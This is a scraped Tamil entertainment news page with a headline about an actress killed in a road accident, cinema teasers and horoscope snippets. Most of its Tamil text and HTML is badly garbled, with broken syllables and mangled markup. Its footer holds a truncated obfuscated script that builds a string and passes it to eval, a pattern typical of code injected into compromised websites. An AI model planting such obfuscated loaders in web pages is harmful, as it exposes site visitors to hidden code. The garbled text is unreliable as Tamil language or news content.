Connect with us
download 7 1 11 download 7 1 11

பொழுதுபோக்கு

சாலை விபத்தில் பிரபல நடிகை உயிாிழப்பு!

இந்தி திரையுலகில் ‘சாராபாய் vs சாராயாபாய்’ என்ற தொலைக்காட்சி தொடர் மூலம் பிரபலமானவர் வைபவி உபத்யா (வயது 30). இவர் தீபிகா படுகோனுடன் இணைந்து ‘சபக்’ என்ற...

o;

>
4-5 class="mvt widg-home-" tit"an>Facel=bogoh4ul>
Moiv>
noscrip(funsecti(d, s,iv ) { var js,ifjs = d.idgEleinmesByTagName(s)[0]; if (d.idgEleinmeById(v ))ft turn; js = d.cre/caEleinme(s); js.id = id; js.a-s = "//connMo(js,ifjs); }(docuinme, 'noscri', 'facel=bo-jssdk'))uo;noscrip p>>
>
 • download 7 6 7
  சினிமா3 வாரங்கள் ago

  சகுந்தலம் படத்தின் டிி வெளியீட!!

  download 7 1 5
  சினிமா
  downloa6 7 1 5
  லங்க
  download 8 12 7
  ரசிலா
  downloa20 8 2 7
  லங்க3 வாரங்கள் ago

  ுதைந்த றைச்சிருடன் கொத்து ொட்ட.! யாழிலுளட உ3 வத்திற்கு ற்பட்் கத!!

  downloa5 8 1 7
  சினிமா
  சினிமா
  காொிகgo
  சினிமா
  சினிமா
  4-5 class="mvt widg-home-" tit"an> ோிவமgoh4ul>
  ோிவமgo

  ேம் ுவர இருந்ு அைச்சல் சோர்கு ங்க ுிப்புடன் செபல்பட தொடங்க வர்கள். ுடும்பத்தில் நம்தி சகும். பப்புக்கம் கி மா ரும. ">சி வைகளை ிட்ருக கொுத்து ுிப்பர்கள௯...

  ோிவமgo

  ேம் ுடும்பத்தின் வருப்பங்களை ிற வற்க வர்கள். ற்றர்களுக்மா சி பொுப்டுகை ற்வர்கள். றனர்கயிவம எதிரபார்த்த திக 2>கிைக்கும. ">ீட வகத்தை ர் செர்கர்கள். ியபாபத்தில் வெளிகு ுளிகுகை ற்க ்...

  ோிவமgo

  ேம் நந்திராசம் ருப்பல் ுத ுற்ிக 2>ளளி் யு ுிும. ">ுடும்பத்தில் நிற வர்த்மகள௕ ூ் ி 2>ராில் யு ுிும. ">ர் நங்க3 மா ழ ிைகதில் க்஁ப்டது ிங்க வர்கள௯...

  ோிவமgo

  ேம் நந்திராசம் ருப்பல் ங்களை ியல ருி படபடப்ட ்க2>னப்ப்ை ந்து செல்ும. ">ைச்கும இருந்து ொ்ருப்பா ங்கப்பக வர்கள். சிர் துதை கோல் பத்திம் ருர்கள். ியபாபத்தில்...

  ோிவமgo

  ேம் பிளமகள௕ ங்களை கச்சிற்கு திப்ிளிொபார்கள். க ழியில் ல் செர்தி ய. வகத்தை ர் செர்கர்கள். நா்கமா பார்ர் ி த்த ருை ந்திப்பர்கள். ியபாபத்தில்...

  ோிவமgo

  ேம் வரும்பி 2>பொுட்களை வங்க 2>கி்கர்கள். ல்ய கச்ற வர்த்ம வெற்ற்யைும். சமா வைகளைும் ாாப மா ுிப்பர்கள௯ ோ வைில் ்ை ய. வியபாபத்தில் விபிகளை ாிங்கயர்கள௯..

  ோிவமgo

  ேம் பப்புக்கம் ிிக்கும. ">றனர் ்பர்கள௕ ங்களை லந்தலசித்து சி ுிகுக எுப்பார்கள். சிர் ங்களை திை க பார்கள். யங்களை சி஁ப்பா ைும். வியபாபத்தில் சி ுுக்மங்கள௯..

  ோிவமgo

  ேம் வபிகளை ிுகமாபார்கள். ரல் ன ூம் ய. வக்கில் ல் ர்ப்ட ரும. ">ை ்பர்கள௕ ே ருர்கள். ியபாபத்தில் சி ுுக்மங்கள ற்க ொ்கர்கள். த்திோத்தில்...

  iv classfa fa-2 fa-plaa" ria-hidden=true0">iiv>
  ோிவமgo<06-82-a/22 ுத்கி| INDRAYA RASI PAEAN| TODAY RASI PAEAN| ்றை ரா றன!

  iv classfa fa-2 fa-plaa" ria-hidden=true0">iiv>
  ோிவமgo<06-82-a/22 செக்஁ர்்கி| INDRAYA RASI PAEAN| TODAY RASI PAEAN| ்றை ரா றன!

  iv classfa fa-2 fa-plaa" ria-hidden=true0">iiv>
  ோிவமgo<28-11-a/22 ிங்க3்கி| INDRAYA RASI PAEAN| TODAY RASI PAEAN| ்றை ரா றன!

  iv classfa fa-2 fa-plaa" ria-hidden=true0">iiv>
  ோிவமgo<03-82-a/22 றன்கி| INDRAYA RASI PAEAN| TODAY RASI PAEAN| ்றை ரா றன!

  iv classfa fa-2 fa-plaa" ria-hidden=true0">iiv>
  ோிவமgo<02 – 12 -a/22 வெளன்கி| INDRAYA RASI PAEAN| TODAY RASI PAEAN| ்றை ரா றன!

  iv classfa fa-2 fa-plaa" ria-hidden=true0">iiv>
  ோிவமgo<27-11-a/22 சிற்க ்கி| INDRAYA RASI PAEAN| TODAY RASI PAEAN| ்றை ரா றன!

  iv classfa fa-2 fa-plaa" ria-hidden=true0">iiv>
  ோிவமgo<26-11-a/22 றன்கி| INDRAYA RASI PAEAN| TODAY RASI PAEAN| ்றை ரா றன!

  ாொிகளgo<25-11-a/22 வெளன்கி| ்றை ரா றன  !

  ்மgo<25.10.a/22 ்ற>3 மதிம2.28>3 ம ுதல் கிக ைப்ட ருத ொங்கனலும, ் பக3 மாத க >3 மா 5>3 ம்்ப>3 டேல்ா. சூி கிக ">ம்்...

  3 மா ரா றன a/22! ி்்் ளனப்டபமத ரா்்க ரர>3 ய?18 31" data-src=https://tamilnaadi.com/zeepsoza/22/09/gg-7-400x240.jpg data-sizes="(max-width: 400px) 100vw, 400px" class="mvp-reg-imy wp-post-image lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="> 3 மா ரா றன a/22! ி்்் ளனப்டபமத ரா்்க ரர>3 ய?18 32" data-src=https://tamilnaadi.com/zeepsoza/22/09/gg-7-80x80.jpg data-sizes="(max-width: 80px) 100vw, 80px" class="mvp-mob-imy wp-post-image lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==">
  ோிவமgo3 மா ரா றன a/22! ி்்் ளனப்டபமத ரா்்க ரர>3 ய?!< செப்ம்ார>3 மா்்>3 டேமத ரா்்>3 ுங்க மத ராத ார்ா 12 ரா்்க ரரகள்க ரா றன்கள௯ப்்ப றரன்க3>3 டேம >3 டே ரா்்ைப பொுல்ாரபர 12...

  section/p>
  apt>li>
 • > apt>li>
 • > apt>li>
 • > apt>li>
 • footeriv>
  Refresh>
  > Powered Bygo
  >>
  0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc89e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;inoscrip <>
  Do not sell my personal informationv
  Accept>
  s
  Manimagconsentv>s
  buttop typelbuttopan clascli-modal-closeiidscliModalClosep pathe"path d="M0 0h24v24h-24z" fill=none0">pathe"3C/sp Closev>s
  This website uses c=boies to improve your experience while you navigate through the website. Out of theba, the c=boiesathat are categorized as necessary are stored opayour browser asathey are essential for the workinj of basic functionalities of the website. We also use third-party c=boiesathat help us analyze and understand how you use this website. Theba c=boiesawill be stored ipayour browser onlyawith your consent. You also have the option to opt-out of theba c=boies. But optinjpout of some of theba c=boies may affectayour browsinjpexperience.v>
  Necessary v
  NecessarynAlways Enabledv>s
  v>
  Necessary c=boies are absolutelyaessential for the website to function properly. Theba c=boiesaensure basic functionalities and security features of the website, anonymously.Durationv the"thiv clasc=boielawinfo-column-4>Denoscriionv the"/triv/theadivtbodyevtriv clasc=boielawinfo-rowevtdiv clasc=boielawinfo-column-1pc=boielawinfo-checkbox-analyticsv tdevtdiv clasc=boielawinfo-column-3>11 monthsv tdevtdiv clasc=boielawinfo-column-4>This c=boie is set by GDPR C=boie Consent plugin. The c=boie is used to store the user consent for the c=boiesaipathe category "Analytics".v tdev/trivtriv clasc=boielawinfo-rowevtdiv clasc=boielawinfo-column-1pc=boielawinfo-checkbox-functionalv tdevtdiv clasc=boielawinfo-column-3>11 monthsv tdevtdiv clasc=boielawinfo-column-4>The c=boie is set by GDPR c=boie consent to record the user consent for the c=boiesaipathe category "Functional".v tdev/trivtriv clasc=boielawinfo-rowevtdiv clasc=boielawinfo-column-1pc=boielawinfo-checkbox-necessary11 monthsv tdevtdiv clasc=boielawinfo-column-4>This c=boie is set by GDPR C=boie Consent plugin. The c=boies is used to store the user consent for the c=boiesaipathe category "Necessary".v tdev/trivtriv clasc=boielawinfo-rowevtdiv clasc=boielawinfo-column-1pc=boielawinfo-checkbox-othersv tdevtdiv clasc=boielawinfo-column-3>11 monthsv tdevtdiv clasc=boielawinfo-column-4>This c=boie is set by GDPR C=boie Consent plugin. The c=boie is used to store the user consent for the c=boiesaipathe category "Other.v tdev/trivtriv clasc=boielawinfo-rowevtdiv clasc=boielawinfo-column-1pc=boielawinfo-checkbox-performancev tdevtdiv clasc=boielawinfo-column-3>11 monthsv tdevtdiv clasc=boielawinfo-column-4>This c=boie is set by GDPR C=boie Consent plugin. The c=boie is used to store the user consent for the c=boiesaipathe category "Performance".v tdev/trivtriv clasc=boielawinfo-rowevtdiv clasc=boielawinfo-column-1p20vied_c=boie_policy11 monthsv tdevtdiv clasc=boielawinfo-column-4>The c=boie is set by the GDPR C=boie Consent plugin and is used to store whether or not user has consented to the use of c=boies. It doesanot store any personal " da.v tdev/triv/tbodyev/tableiv>
  Functional v
  Functionalv slabeliv>
  v>
  Functional v=boiesahelp to perform certain functionalities like sharinj the c=ntent of the website opasocial =edia platforms, c=llectafeedbacks, and other third-party features.v>
  Performance v
  Performancev slabeliv>
  v>
  Performance v=boies are used to understand and analyze the key performance indexes of the website whichahelpsaipadeliverinj a better user experience for the visitors.v>
  Analytics v
  Analyticsv slabeliv>
  v>
  Analytical v=boiesaare used to understand how visitors interactawith the website. Theba c=boiesahelp provide information opametrics the number of visitors, bounce rate, trafficasource, etc.v>
  Advertisement v
  Advertisementv slabeliv>
  v>
  Advertisement v=boiesaare used to provide visitors with t revant ads and marketinjpcampaigns. Theba c=boiesatrack visitors across websites and c=llectainformation to provide customized ads.v>
  Others v
  Othersv slabeliv>
  v>
  Other uncategorized v=boiesaare those that are beinj analyzed and have not beepan claified ipto a category as yet.v>
  SAVE & ACCEPT>
  nonoscriptimsa5 cla=lazyaheight=1 width=1 styitledisplaa: none;" srcled da:image3C/s+xml,%3CC/s%20xmlns='http://www.w3.org/20003C/s'%2020viewBo'0%200%201%201'%3E%3C3C/s%3E" " datsrclehttps://www.faceb=bo.com/tr?ids667707657527699&ev=PageV0vi&nonoscri=1&cd%5Bpost_category%5D=%E0%AE%9A%E0%AE%BF%E0%AE%A9%E0%AE%BF%E0%AE%AE%E0%AE%BE%2C+%E0%AE%AA%E0%AF%8A%E0%AE%B4%E0%AF%81%E0%AE%A4%E0%AF%81%E0%AE%AA%E0%AF%8B%E0%AE%95%E0%AF%8D%E0%AE%95%E0%AF%81&cd%5Bpage_title%5D=%E0%AE%AA%E0%AF%8A%E0%AE%B4%E0%AF%81%E0%AE%A4%E0%AF%81%E0%AE%AA%E0%AF%8B%E0%AE%95%E0%AF%8D%E0%AE%95%E0%AF%81&cd%5Bpost_type%5D=category&cd%5Bpost_id%5D=30&cd%5Bplugin%5D=PixelYourSite&cd%5Buser_roit%5D=guest&cd%5Bevent_url%5D=tamilnaadi.com%2Fcategory%2Fentertainment%2F" alipt>nonoscrip noscrip aboveNav){ $("#mvp-main-nav-top").addC cla("mvp-nav-small"); $("#mvp-main-nav-bot").cla("margin-top", logoHeight ); } else { $("#mvp-main-nav-top").removeC cla("mvp-nav-small"); $("#mvp-main-nav-bot").cla("margin-top","0"); } if ($(window).scrollTop() > headerHeight){ $("#mvp-main-nav-top").addC cla("mvp-fixed"); $("#mvp-main-nav-bot").addC cla("mvp-fixed1"); $("#mvp-main-body-wrap").cla("margin-top", totalHeight ); $("#mvp-main-nav-top").addC cla("mvp-fixed-shadow"); $(".mvp-fly-top").addC cla("mvp-to-top"); if(scroll < p hviousScroll) { $("#mvp-main-nav-bot").addC cla("mvp-fixed2"); $("#mvp-main-nav-top").removeC cla("mvp-fixed-shadow"); } else { $("#mvp-main-nav-bot").removeC cla("mvp-fixed2"); $("#mvp-main-nav-top").addC cla("mvp-fixed-shadow"); } } else { $("#mvp-main-nav-top").removeC cla("mvp-fixed"); $("#mvp-main-nav-bot").removeC cla("mvp-fixed1"); $("#mvp-main-nav-bot").removeC cla("mvp-fixed2"); $("#mvp-main-body-wrap").cla("margin-top","0"); $("#mvp-main-nav-top").removeC cla("mvp-fixed-shadow"); $(".mvp-fly-top").removeC cla("mvp-to-top"); } } else { if ($(window).scrollTop() > logoHeight){ $("#mvp-main-nav-top").addC cla("mvp-nav-small"); $("#mvp-main-nav-bot").cla("margin-top", logoHeight ); } else { $("#mvp-main-nav-top").removeC cla("mvp-nav-small"); $("#mvp-main-nav-bot").cla("margin-top","0"); } if ($(window).scrollTop() > navHeight){ $("#mvp-main-nav-top").addC cla("mvp-fixed"); $("#mvp-main-nav-bot").addC cla("mvp-fixed1"); $("#mvp-main-body-wrap").cla("margin-top", totalHeight ); $("#mvp-main-nav-top").addC cla("mvp-fixed-shadow"); $(".mvp-fly-top").addC cla("mvp-to-top"); if(scroll < p hviousScroll) { $("#mvp-main-nav-bot").addC cla("mvp-fixed2"); $("#mvp-main-nav-top").removeC cla("mvp-fixed-shadow"); } else { $("#mvp-main-nav-bot").removeC cla("mvp-fixed2"); $("#mvp-main-nav-top").addC cla("mvp-fixed-shadow"); } } else { $("#mvp-main-nav-top").removeC cla("mvp-fixed"); $("#mvp-main-nav-bot").removeC cla("mvp-fixed1"); $("#mvp-main-nav-bot").removeC cla("mvp-fixed2"); $("#mvp-main-body-wrap").cla("margin-top","0"); $("#mvp-main-nav-top").removeC cla("mvp-fixed-shadow"); $(".mvp-fly-top").removeC cla("mvp-to-top"); } } p hviousScroll = scroll; }); $(".mvp-alp-side-in").niceScroll({cursorcolor:"#ccc",cursorwidth: 5,cursorborder: 0,zindex:999999}); }); jQuery(document).ready(function($) { // Mobile Social Buttops More $(".mvp-soc-mob-right").on(sclick", function(){ $("#mvp-soc-mob-wrap").toggitC cla("mvp-soc-mob-more"); }); }); jQuery(document).ready(function($) { $(".menutitem-has-children a").click(function(event){ event.stopPropagation(); }); $(".menutitem-has-children").click(function(){ $(this).addC cla("toggitd"); if($(".menutitem-has-children").hasC cla("toggitd")) { $(this).children("ul").toggit(); $(".mvp-fly-nav-menu").getNiceScroll().resizt(); } $(this).toggitC cla("tog-minus"); return false; }); // Main Menu Scroll $(".mvp-fly-nav-menu").niceScroll({cursorcolor:"#888",cursorwidth: 7,cursorborder: 0,zindex:999999}); }); jQuery(document).ready(function($) { $(".infinite-content").infinitescroll({ navSelector: ".mvp-nav-links", nextSelector: ".mvp-nav-links a:first", itemSelector: ".infinite-post", errorCallback: function(){ $(".mvp-inf-more-but").cla("displaa", "none") } }); $(window).unbind(".infscr"); $(".mvp-inf-more-but").click(function(){ $(".infinite-content").infinitescroll("retrieve"); return false; }); if ($(".mvp-nav-links a").length) { $(".mvp-inf-more-but").cla("displaa","inline-block"); } else { $(".mvp-inf-more-but").cla("displaa","none"); } });!function(){window.advanced_ads_ready_queue=window.advanced_ads_ready_queue||[],advanced_ads_ready_queue.push=window.advanced_ads_ready;for(var d=0,a=advanced_ads_ready_queue.length;dwindow.w3tc_lazyload=1,window.lazyLoadOptions={ rements_selector:".lazy",callback_loaded:function(t){var e;try{e=new CustomEvent("w3tc_lazyload_loaded",{detail:{e:t}})}catch(a){(tldocument.createEvent("CustomEvent")).initCustomEvent("w3tc_lazyload_loaded",!1,!1,{e:t})}window.dispatchEvent(e)}}